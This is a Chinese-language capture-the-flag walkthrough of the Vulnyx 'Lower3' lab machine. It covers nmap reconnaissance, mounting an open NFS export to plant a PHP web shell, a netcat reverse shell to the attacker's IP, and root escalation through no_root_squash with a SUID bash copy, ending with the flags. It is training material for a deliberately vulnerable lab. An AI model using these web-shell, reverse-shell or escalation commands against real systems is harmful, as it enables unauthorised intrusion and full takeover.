Vlx_Lower3

靶机来源: https://vulnyx.com/

难度:Low

一、信息收集

1、主机探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 16:10 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00015s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00015s latency).
MAC Address: 08:00:27:9E:AE:CF (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.87
Host is up (0.00065s latency).
MAC Address: 08:00:27:62:5A:06 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 9.53 seconds

靶机IP:192.168.2.87

2、端口扫描

1.全端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.87                      
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 16:10 +0800
Nmap scan report for 192.168.2.87
Host is up (0.0012s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
2049/tcp  open  nfs
35643/tcp open  unknown
37861/tcp open  unknown
43655/tcp open  unknown
52565/tcp open  unknown
MAC Address: 08:00:27:62:5A:06 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 32.70 seconds

开放端口:22、80、111、2049....

2.详细信息扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,80,111,2049 192.168.2.87
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 16:11 +0800
Nmap scan report for 192.168.2.87
Host is up (0.00080s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37558/udp6  mountd
|   100005  1,2,3      52565/tcp   mountd
|   100005  1,2,3      52659/tcp6  mountd
|   100005  1,2,3      57453/udp   mountd
|   100021  1,3,4      35723/tcp6  nlockmgr
|   100021  1,3,4      37861/tcp   nlockmgr
|   100021  1,3,4      40617/udp   nlockmgr
|   100021  1,3,4      47025/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp open  nfs     3-4 (RPC #100003)
MAC Address: 08:00:27:62:5A:06 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.96 seconds

3.udp扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.87                             
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 16:14 +0800
Nmap scan report for 192.168.2.87
Host is up (0.0010s latency).
Not shown: 55 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response)
PORT     STATE SERVICE
111/udp  open  rpcbind
2049/udp open  nfs
MAC Address: 08:00:27:62:5A:06 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 54.48 seconds

二、WEB渗透

1、80端口

访问80端口,是Apache的默认页面

2、目录扫描

1

三、NFS

开放了2049和111端口,查看可以挂载的目录

1
2
3
4
┌──(root㉿kali)-[~/miaosec]
└─# showmount -e 192.168.2.87
Export list for 192.168.2.87:
/var/www/html *

将目录进行挂载

1
2
┌──(root㉿kali)-[~/miaosec]
└─# mount -t nfs 192.168.2.87:/var/www/html /tmp

写入文件,直接反弹shell

1
2
┌──(root㉿kali)-[/tmp]
└─# echo -n '<?php system($_GET["cmd"]); ?>' > cmd.php

验证

1
2
3
┌──(root㉿kali)-[/tmp]
└─# curl -sX GET "http://192.168.2.87/cmd.php?cmd=id"                       
uid=1000(low) gid=1000(low) groups=1000(low)

四、获取Low权限

直接反弹shell

1
2
┌──(root㉿kali)-[/tmp]
└─# curl -sX GET "http://192.168.2.87/cmd.php?cmd=nc+192.168.2.4+4444+-e+/bin/sh"

成功获取到shell

1
2
3
4
5
6
┌──(root㉿kali)-[~/miaosec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.87] 51478
id
uid=1000(low) gid=1000(low) groups=1000(low)

稳定shell

1
2
3
4
5
6
7
8
/usr/bin/script -qc /bin/bash /dev/null
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

五、权限提升

查看 NFS服务器 的导出配置/etc/exports

1
2
3
4
5
6
7
8
9
10
11
12
low@lower3:/var/www/html$ cat /etc/exports 
# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/var/www/html/       *(rw,sync,insecure,no_root_squash,no_subtree_check)

发现在 NFS 配置中设置 no_root_squash,因此可以在挂载点内以 root 用户身份在特权上下文中执行任意操作。 如果攻击者在客户端以 root 身份挂载此 NFS 共享,就能以 服务器上的 root 权限 读写 /var/www/html/ 中的任何文件!

复制/bin/bash/var/www/html/目录下

1
2
low@lower3:/home/low$ cd /var/www/html
low@lower3:/var/www/html$ cp /bin/bash .

从挂载点,将/bin/bash 分配 SUID (4755) 权限,并将所有者更改为 root

1
2
3
4
5
┌──(root㉿kali)-[/tmp]
└─# chown root:root bash
  
┌──(root㉿kali)-[/tmp]
└─# chmod 4755 bash

执行命令,成功获取到root权限

1
2
3
low@lower3:/var/www/html$ ./bash -p
bash-5.1# id
uid=1000(low) gid=1000(low) euid=0(root) groups=1000(low)

六、查看FLAG

1
2
3
bash-5.1# cat /root/root.txt /home/low/user.txt 
da0a4e93754fe6808c69909fe8c36a54
eed0bec06e4dc67b60d8bd762a843d75
Vulnyx
#TCP2049_Nfs #RCE #Nfs_no_root_squash
Vlx_Lower3
http://miao-sec.github.io/Vulnyx/Vlx-Lower3/
作者
Miao
发布于
2026年3月13日
许可协议
BY-MIAO